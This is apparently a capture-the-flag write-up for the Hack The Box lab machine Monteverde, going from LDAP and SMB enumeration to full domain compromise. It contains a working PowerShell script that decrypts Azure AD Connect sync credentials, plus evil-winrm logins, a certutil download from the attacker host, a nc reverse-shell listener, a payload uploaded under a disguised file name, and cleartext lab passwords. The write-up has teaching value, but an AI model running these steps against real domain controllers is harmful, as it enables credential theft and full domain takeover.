As always we start with an nmap scan:
# Nmap 7.80 scan initiated Mon Jan 13 07:39:41 2020 as: nmap -A -oN fullscan-A 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.081s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-01-13 12:50:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/13%Time=5E1C651E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m42s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-01-13T12:53:03
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   104.46 ms 10.10.16.1
2   104.61 ms 10.10.10.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 07:44:56 2020 -- 1 IP address (1 host up) scanned in 315.99 seconds
Kerberos (88/464), LDAP (389/636) and the global catalog (3268/3269) mark this as a domain controller for MEGABANK.LOCAL, hostname MONTEVERDE. SMB signing is enabled and required, so NTLM relay is off the table from the start. I found the users with an anonymous LDAP bind (no credentials needed, which is a finding in itself):
root@kali:~/htb/monteverde# ldapsearch -h 10.10.10.172 -p 389 -x -b "dc=MEGABANK,dc=LOCAL" > ldaplogall.txt

The entry in ldaplogall.txt that matters later is the Azure Admins group:

# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103001011.0Z
whenChanged: 20200103001032.0Z
uSNCreated: 36889
uSNChanged: 36897
name: Azure Admins
objectGUID:: iCAImwQrNUW6YeEQTXxy+w==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103123551.0Z
dSCorePropagationData: 16010101000001.0Z

Two things to note here: Mike Hope (mhope) is a member, and so is AAD_987d7f2f57d2, which is the naming pattern of the service account Azure AD Connect creates for itself, so the sync product is almost certainly installed on this DC. The dump also lists the domain's accounts; the service account SABatchJobs accepts its own username as its password, and that is enough to list the shares:
root@kali:~/htb/monteverde# smbmap -u SABatchJobs -p SABatchJobs -d MEGABANK -H 10.10.10.172
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445	Name: MEGABANK.local
	Disk                 Permissions
	----                 -----------
	ADMIN$               NO ACCESS
	azure_uploads        READ ONLY
	C$                   NO ACCESS
	E$                   NO ACCESS
	IPC$                 READ ONLY
	NETLOGON             READ ONLY
	SYSVOL               READ ONLY
	users$               READ ONLY
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

		524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020

		524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \mhope\>
root@kali:~/htb/monteverde# cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
The file is a PowerShell CLIXML export (what Export-Clixml writes) of an Azure PSADPasswordCredential object, with the password stored in clear text. Because it sits in the mhope folder of the users$ share, that password is a good guess for his domain account: mhope : 4n0therD4y@n0th3r$
With evil-winrm you can connect to the box as mhope and read the user flag:
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
Getting root
If you look at the group memberships of this user (the ldapsearch output above already lists Mike Hope as a member), you can see that he is in the Azure Admins group.
On a host running Azure AD Connect that matters a lot. The sync service keeps the credentials of the on-premises AD account it synchronises with in its ADSync SQL database, encrypted with key material that members of the Azure AD Connect admin group are allowed to load. That sync account needs directory-replication rights to do its job, so recovering its password is equivalent to being able to run DCSync. On this box the stored account turns out to be the domain Administrator itself.
Running the attack is as easy as downloading the PS1 script from:
https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
More background on the technique: https://blog.xpnsec.com/azuread-connect-for-redteam/
Next we upload it (under a harmless-looking name, into C:\Windows\System32\spool\drivers\color, which is writable by unprivileged users), rename it, load it and run it against the local ADSync database:
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /root/htb/monteverde/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\shellcode.xml
Info: Uploading /root/htb/monteverde/Azure-ADConnect.ps1 to c:\windows\system32\spool\drivers\color\shellcode.xml

Data: 3016 bytes of 3016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ren shellcode.xml Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ./Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Import-Module ./Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain:   MEGABANK.LOCAL
[+] Username: administrator
[+] Password: d0m@in4dminyeah!
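What the script is doing under the hood, as an added example written for this page: it is not the Hackplayers script and was not run on Monteverde, it follows the steps described in the xpnsec post linked above. Assumed rather than taken from the page: the SQL Express instance on 127.0.0.1 accepts Windows integrated authentication from the calling user, mcrypt.dll is at its default install path, and the on-premises connector is the row with ma_type = 'AD'. The KeyManager method calls are the ones the xpnsec post uses.

```powershell
# Added example (not the page's or the Hackplayers script): reconstruct the
# Azure AD Connect sync-account credentials from the ADSync database.
# Assumptions: integrated auth to a local SQL instance, default mcrypt.dll
# path, connector row tagged ma_type = 'AD'. Run as a member of the group the
# installer granted database access to (on Monteverde: Azure Admins).
param(
    [string]$Server     = '127.0.0.1',
    [string]$Database   = 'ADSync',
    [string]$McryptPath = 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
)

if (-not (Test-Path $McryptPath)) {
    throw "mcrypt.dll not found at $McryptPath; is Azure AD Connect installed here?"
}

# 1. Open the ADSync database with the caller's Windows identity. No SQL
#    password is involved: the database ACL is what gates this step.
$conn = New-Object System.Data.SqlClient.SqlConnection `
    -ArgumentList "Data Source=$Server;Initial Catalog=$Database;Integrated Security=True"
$conn.Open()

# 2. keyset_id / instance_id / entropy identify the DPAPI-protected keyset
#    that mcrypt.dll needs in order to unwrap the per-connector secrets.
$cmd = $conn.CreateCommand()
$cmd.CommandText = 'SELECT keyset_id, instance_id, entropy FROM mms_server_configuration'
$reader = $cmd.ExecuteReader()
[void]$reader.Read()
$keysetId   = $reader.GetInt32(0)
$instanceId = $reader.GetGuid(1)
$entropy    = $reader.GetGuid(2)
$reader.Close()

# 3. The on-prem AD connector stores domain and user name in clear XML and
#    the password separately as a base64-encoded encrypted blob.
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration " +
                   "FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
if (-not $reader.Read()) { throw "no connector with ma_type = 'AD' in $Database" }
$configXml = $reader.GetString(0)
$encrypted = $reader.GetString(1)
$reader.Close()
$conn.Close()

# 4. Let the product's own crypto library load the keyset and decrypt the blob
#    (same call sequence as the xpnsec write-up).
Add-Type -Path $McryptPath
$km = New-Object Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instanceId, $keysetId)
$activeKey = $null
$km.GetActiveCredentialKey([ref]$activeKey)
$key = $null
$km.GetKey(1, [ref]$key)
$decryptedXml = $null
$key.DecryptBase64ToString($encrypted, [ref]$decryptedXml)

# 5. Pull the three values out of the two XML documents.
$domain   = (Select-Xml -Content $configXml    -XPath "//parameter[@name='forest-login-domain']").Node.InnerXml
$username = (Select-Xml -Content $configXml    -XPath "//parameter[@name='forest-login-user']").Node.InnerXml
$password = (Select-Xml -Content $decryptedXml -XPath "//attribute").Node.InnerXml

[PSCustomObject]@{ Domain = $domain; Username = $username; Password = $password }
```

Run it from the mhope WinRM session and it returns the same domain/username/password triple the Hackplayers script printed. On a real engagement, the follow-up check is whether the recovered account holds the "Replicating Directory Changes" rights on the domain head (it must, for the sync to function); that is what makes this a DCSync-equivalent rather than just one more password.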
With the Administrator password you can log in over WinRM again and read the root flag:
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u administrator -p 'd0m@in4dminyeah!'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
12909612d25c8dcf6e5a07d1a804a0bc
After some failures. For the record, the two approaches that did not work. Serving the script from impacket-smbserver with default options fails because Windows refuses the SMB1 dialect the server offers (starting it with -smb2support avoids this):
root@kali:~/htb/monteverde# impacket-smbserver share ./
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
C:\windows\system32\spool\drivers\color>copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
Pulling the script over HTTP with certutil from a reverse shell (caught with nc on 443, running as mhope) did not work either: Defender flagged the script as soon as certutil wrote it to disk:

root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.172] 61971
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\spool\drivers\color>whoami /all
whoami /all

USER INFORMATION
----------------

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601
--snip--

C:\windows\system32\spool\drivers\color>powershell -nop -Exec Bypass certutil -urlcache -split -f http://10.10.16.70/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
This script contains malicious content and has been blocked by your antivirus software.
Author : Puckiestyle